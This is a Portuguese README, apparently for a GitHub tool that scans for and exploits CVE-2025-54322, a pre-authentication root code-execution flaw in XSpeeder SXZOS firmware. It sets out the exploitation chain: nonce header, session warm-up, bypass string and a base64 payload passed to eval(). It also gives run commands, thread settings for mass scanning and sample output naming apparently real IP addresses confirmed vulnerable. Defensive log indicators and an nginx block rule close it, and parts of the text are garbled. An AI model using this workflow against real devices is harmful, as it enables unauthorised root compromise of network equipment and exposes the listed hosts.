
CVE-2025-54322 - Localizador Rápido de RCE 0day Pré-Autenticação XSpeeder SXZOS
Um scanner de vulnerabilidade multi-thread para CVE-2025-54322, uma vulnerabilidade de execução remota de código não autenticada no firmware XSpeeder SXZOS afetando ~70.000+ hosts globalmente.
CVE-2025-54322 é uma vulnerabilidade crítica de execução remota de código pré-autenticação descoberta no firmware XSpeeder SXZOS, que alimenta dispositivos SD-WAN, roteadores e equipamentos de borda de rede.
A vulnerabilidade existe na interface web baseada em Django do firmware SXZOS:
/?title=ABC&oIp=XXX&chkid=[payload_base64]eval() do Python em entrada de usuário decodificada em base641. Calcular nonce baseado em tempo para o cabeçalho X-SXZ-R
2. Aquecer sessão via endpoint /webInfos/
3. Criar payload malicioso com string de bypass (#sUserCodexsPwd)
4. Codificar payload em base64
5. Enviar exploit com exatamente 3 parâmetros de consulta
6. Servidor decodifica e avalia o payload
7. Comandos executados com privilégios root
O exploit contorna múltiplas camadas de defesa:
SXZ/2.3X-SXZ-R: [0-6]/webInfos/#sUserCodexsPwdvuln-confirm.txt imediatamente# Clone o repositório
git clone https://github.com/Sachinart/CVE-2025-54322.git
cd CVE-2025-54322
# Instale as dependências necessárias
pip install -r requirements.txt
Crie um arquivo requirements.txt:
requests>=2.31.0
urllib3>=2.0.0
python3 scanner.py targets.txt
# Escanear com número personalizado de threads (padrão: 10)
python3 scanner.py targets.txt 20
# Escanear com o máximo de threads para resultados mais rápidos
python3 scanner.py targets.txt 50
# Escanear com número conservador de threads
python3 scanner.py targets.txt 5
Crie um arquivo targets.txt com um alvo por linha:
https://192.168.1.100:4433
https://10.0.0.50:8443
https://example.com:4433
http://vulnerable-device.local
$ python3 scanner.py targets.txt 20
╔═══════════════════════════════════════════════════════════════╗
║ XSpeeder SXZOS (CVE-2025-54322) RCE Scanner ║
║ Pre-Auth Root RCE Vulnerability Checker ║
║ Showing: VULNERABLE HOSTS ONLY ║
╚═══════════════════════════════════════════════════════════════╝
[*] Loaded 2338 targets from targets.txt
[*] Using 20 concurrent threads
[*] Vulnerable hosts will be saved to: vuln-confirm.txt
[*] Starting scan...
======================================================================
[+] VULNERABLE: https://27.40.80.93:4433
[+] Status: VULNERABLE - RCE Confirmed
[+] HTTP Status: 500
[+] Output: uid=0(root) gid=0(root)
======================================================================
[*] Progress: 50/2338 | Found: 12 vulnerable
[*] Progress: 100/2338 | Found: 24 vulnerable
======================================================================
[*] SCAN COMPLETE
======================================================================
[*] Total Time: 890.45 seconds
[*] Total Targets Scanned: 2338
[*] Vulnerable Hosts Found: 156
[*] Success Rate: 6.67%
======================================================================
O scanner exibe:
vuln-confirm.txt)XSpeeder SXZOS CVE-2025-54322 - Vulnerable Hosts
Scan started: 2025-12-27 15:30:45
======================================================================
https://27.40.80.93:4433
Status: VULNERABLE - RCE Confirmed
Output: uid=0(root) gid=0(root)
----------------------------------------------------------------------
https://27.40.83.189:4433
Status: VULNERABLE - RCE Confirmed
Output: uid=0(root) gid=0(root)
----------------------------------------------------------------------
======================================================================
Scan completed: 2025-12-27 15:45:30
Total scanned: 2338
Vulnerable: 156
Time taken: 890.45 seconds
Esta ferramenta é fornecida apenas para fins educacionais e de teste de segurança autorizado.
Se você descobrir sistemas vulneráveis:
Se você gerencia dispositivos XSpeeder SXZOS:
Procure por estes indicadores nos logs:
/?title=*&oIp=*&chkid=* com payloads base64SXZ/2.3X-SXZ-R incomuns#sUserCodexsPwd/webInfos/ seguidas do caminho raiz# Regra Nginx para bloquear tentativas de exploração
location / {
if ($args ~* "chkid=") {
return 403;
}
}
Esta vulnerabilidade foi descoberta autonomamente por pwn.ai - uma plataforma de pesquisa de segurança alimentada por IA.
Nota Importante: Esta é a primeira vulnerabilidade RCE zero-day de exploração remota descoberta por agentes publicamente documentada.
Chirag Artani
Esta implementação de scanner foi criada para auxiliar profissionais de segurança a:
Este projeto está licenciado sob a Licença MIT - veja o arquivo LICENSE para detalhes.
Contribuições são bem-vindas! Sinta-se à vontade para enviar um Pull Request.
Para perguntas, problemas ou sugestões:
Lembre-se: Com grandes poderes vêm grandes responsabilidades. Use esta ferramenta de forma ética e legal.
Mantenha-se Seguro. Mantenha-se Ético. Mantenha-se Legal.
| Campo | Valor |
|---|
| ID CVE | CVE-2025-54322 |
| Fornecedor | XSpeeder (fornecedor chinês de rede) |
| Produto Afetado | Firmware SXZOS |
| Tipo de Vulnerabilidade | Execução Remota de Código Pré-Autenticação (RCE) |
| Pontuação CVSS | 9.8+ (Crítico) |
| Vetor de Ataque | Rede |
| Privilégios Necessários | Nenhum |
| Interação do Usuário | Nenhum |
| Impacto | Comprometimento total do sistema com privilégios root |
| Quantidade de Alvos | Threads Recomendadas | Tempo Esperado |
|---|
| 1-10 | 5 threads | ~1-2 min |
| 10-50 | 10 threads | ~3-5 min |
| 50-100 | 20 threads | ~5-10 min |
| 100-500 | 30 threads | ~10-20 min |
| 500+ | 40-50 threads | ~20+ min |